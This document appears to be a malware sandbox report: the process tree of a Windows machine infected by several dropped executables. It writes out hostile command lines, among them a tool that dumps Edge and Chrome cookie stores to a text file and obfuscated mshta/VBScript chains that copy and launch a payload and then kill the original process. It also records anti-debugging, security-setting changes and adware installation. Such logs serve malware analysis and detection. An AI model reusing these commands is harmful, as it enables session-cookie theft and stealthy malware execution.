C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6284
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6760
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:7928
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5976
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6384
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4564
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6988
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5672
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:2336
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:580
-
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:5536 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5536 -s 30444⤵
- Program crash
PID:7400
-
-
-
-
C:\Users\Admin\Documents\sS4SJt7kGIn3r8zGhBAbhriC.exe"C:\Users\Admin\Documents\sS4SJt7kGIn3r8zGhBAbhriC.exe"2⤵
- Executes dropped EXE
PID:1288 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1288 -s 2883⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:448
-
-
-
C:\Users\Admin\Documents\QWkRQOfbHSqTGrIi48RLX2FQ.exe"C:\Users\Admin\Documents\QWkRQOfbHSqTGrIi48RLX2FQ.exe"2⤵
- Executes dropped EXE
PID:132
-
-
C:\Users\Admin\Documents\dpqMM4s0cWF7HV_5Bh5NI1PJ.exe"C:\Users\Admin\Documents\dpqMM4s0cWF7HV_5Bh5NI1PJ.exe"2⤵
- Executes dropped EXE
PID:2692 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2692 -s 2723⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5504
-
-
-
C:\Users\Admin\Documents\hSAu1cIsoj3tSOEeS695pgZd.exe"C:\Users\Admin\Documents\hSAu1cIsoj3tSOEeS695pgZd.exe"2⤵
- Executes dropped EXE
PID:1108 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\hSAu1cIsoj3tSOEeS695pgZd.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\hSAu1cIsoj3tSOEeS695pgZd.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )3⤵PID:5452
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\hSAu1cIsoj3tSOEeS695pgZd.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\hSAu1cIsoj3tSOEeS695pgZd.exe" ) do taskkill -f -iM "%~NxA"4⤵PID:4844
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "hSAu1cIsoj3tSOEeS695pgZd.exe"5⤵
- Kills process with taskkill
PID:6160
-
-
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXEhbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS5⤵
- Executes dropped EXE
PID:6152 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )6⤵PID:6760
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " =="" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"7⤵PID:5324
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a6⤵
- Loads dropped DLL
PID:6992
-
-
-
-
-
-
C:\Users\Admin\Documents\ZUo0uYcXQ6tawGNVdoS8xDF1.exe"C:\Users\Admin\Documents\ZUo0uYcXQ6tawGNVdoS8xDF1.exe"2⤵
- Executes dropped EXE
PID:4808 -
C:\Users\Admin\Documents\ZUo0uYcXQ6tawGNVdoS8xDF1.exe"C:\Users\Admin\Documents\ZUo0uYcXQ6tawGNVdoS8xDF1.exe" -q3⤵
- Executes dropped EXE
PID:5848
-
-
-
C:\Users\Admin\Documents\5fwi947Cu_zTcDhLWi2JZpDS.exe"C:\Users\Admin\Documents\5fwi947Cu_zTcDhLWi2JZpDS.exe"2⤵
- Executes dropped EXE
PID:2360 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 2363⤵
- Program crash
PID:6936
-
-
-
C:\Users\Admin\Documents\3mxuMDrjEgc4ckDTLozUcAjV.exe"C:\Users\Admin\Documents\3mxuMDrjEgc4ckDTLozUcAjV.exe"2⤵
- Executes dropped EXE
PID:3716 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3716 -s 3203⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5832
-
-
-
C:\Users\Admin\Documents\ASgUF9C77qZJY8sP5PlBHOAe.exe"C:\Users\Admin\Documents\ASgUF9C77qZJY8sP5PlBHOAe.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1576
-
-
C:\Users\Admin\Documents\09LEGzfhAptbUMxOEf3W9wFo.exe"C:\Users\Admin\Documents\09LEGzfhAptbUMxOEf3W9wFo.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2940
-
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv RVgSDzhRD0adYMHqqPjP9w.0.21⤵PID:4480
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
PID:1196
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4756
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2692 -ip 26921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:588
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2360 -ip 23601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:868
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3828 -ip 38281⤵PID:3608
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3716 -ip 37161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5580
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5908 -ip 59081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:932
-
C:\Users\Admin\AppData\Local\Temp\9A1.exeC:\Users\Admin\AppData\Local\Temp\9A1.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5956
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1288 -ip 12881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2932
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2692 -ip 26921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6112
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2360 -ip 23601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5772
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5848 -ip 58481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3608
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
PID:6308 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding BD93C6BE14E1E6DE7200F396E2BEAF3A C2⤵
- Loads dropped DLL
PID:6364
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 559B72828727C82DA4F030A751CAF608 C2⤵
- Loads dropped DLL
PID:7828
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 39E78278BBA1DC171CBEC428C0B4499D2⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:7792
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 8DF41C9AA81667A58CDD299704CACF70 C2⤵
- Loads dropped DLL
PID:5448
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 181600F9BC7B68B8AD6F5B53016831B7 C2⤵
- Loads dropped DLL
PID:7016
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"2⤵PID:3924
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default3⤵PID:4512
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"4⤵PID:6652
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7fff02f1dec0,0x7fff02f1ded0,0x7fff02f1dee05⤵PID:7836
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff7796f9e70,0x7ff7796f9e80,0x7ff7796f9e906⤵PID:7284
-
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1692,15481220408766578556,14928935382160169214,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6652_1073689520" --mojo-platform-channel-handle=2188 /prefetch:85⤵PID:7452
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1692,15481220408766578556,14928935382160169214,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6652_1073689520" --mojo-platform-channel-handle=1756 /prefetch:85⤵PID:4108
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1692,15481220408766578556,14928935382160169214,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6652_1073689520" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1708 /prefetch:25⤵PID:4632
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1692,15481220408766578556,14928935382160169214,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6652_1073689520" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2372 /prefetch:15⤵PID:3976
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1692,15481220408766578556,14928935382160169214,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6652_1073689520" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2364 /prefetch:15⤵PID:5876
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1692,15481220408766578556,14928935382160169214,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6652_1073689520" --mojo-platform-channel-handle=3236 /prefetch:85⤵PID:2604
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1692,15481220408766578556,14928935382160169214,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6652_1073689520" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3372 /prefetch:25⤵PID:1312
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1692,15481220408766578556,14928935382160169214,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6652_1073689520" --mojo-platform-channel-handle=3520 /prefetch:85⤵PID:4064
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1692,15481220408766578556,14928935382160169214,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6652_1073689520" --mojo-platform-channel-handle=3604 /prefetch:85⤵PID:2900
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1692,15481220408766578556,14928935382160169214,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6652_1073689520" --mojo-platform-channel-handle=2420 /prefetch:85⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3492
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1692,15481220408766578556,14928935382160169214,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6652_1073689520" --mojo-platform-channel-handle=2904 /prefetch:85⤵PID:860
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_C22B.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"3⤵PID:4984
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 2364 -ip 23641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4164
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 428 -ip 4281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6388
-
C:\Users\Admin\AppData\Local\Temp\8A8A.exeC:\Users\Admin\AppData\Local\Temp\8A8A.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6164
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 6680 -ip 66801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6792
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6616 -ip 66161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2516
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 6404 -ip 64041⤵PID:1936
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 6436 -ip 64361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3316
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 756 -p 4100 -ip 41001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1948
-
C:\Users\Admin\AppData\Local\Temp\AC1C.exeC:\Users\Admin\AppData\Local\Temp\AC1C.exe1⤵PID:5324
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5324 -s 2922⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7268
-
-
C:\Users\Admin\AppData\Local\Temp\C0AF.exeC:\Users\Admin\AppData\Local\Temp\C0AF.exe1⤵PID:3024
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3024 -s 2802⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6832
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1040 -ip 10401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6040
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6444 -ip 64441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7540
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 6428 -ip 64281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7996
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 2288 -ip 22881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7956
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 5324 -ip 53241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2984
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3024 -ip 30241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:236
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:7656
-
C:\Users\Admin\AppData\Local\Temp\3469.exeC:\Users\Admin\AppData\Local\Temp\3469.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7460
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 388 -p 1188 -ip 11881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5656
-
C:\Users\Admin\AppData\Local\Temp\6926.exeC:\Users\Admin\AppData\Local\Temp\6926.exe1⤵PID:580
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
- Executes dropped EXE
PID:1768
-
-
C:\Users\Admin\AppData\Local\Temp\78B7.exeC:\Users\Admin\AppData\Local\Temp\78B7.exe1⤵PID:1752
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1752 -s 2962⤵
- Program crash
PID:3260
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 1180 -ip 11801⤵PID:8140
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:7324 -
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{765048ed-882d-7049-8d81-df6ba1707837}\oemvista.inf" "9" "4d14a44ff" "0000000000000160" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:7856
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000160" "cbd"2⤵
- Drops file in Drivers directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:5028
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1752 -ip 17521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6120
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 576 -p 5896 -ip 58961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6540
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:1584
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc1⤵PID:3536
-
C:\Users\Admin\AppData\Local\Temp\D57E.exeC:\Users\Admin\AppData\Local\Temp\D57E.exe1⤵
- Windows security modification
- Suspicious use of SetThreadContext
PID:3372 -
C:\Users\Admin\AppData\Local\Temp\f8eb4a45-bc0f-4b56-9d63-01447b3b5fa4\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\f8eb4a45-bc0f-4b56-9d63-01447b3b5fa4\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\f8eb4a45-bc0f-4b56-9d63-01447b3b5fa4\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run2⤵PID:5180
-
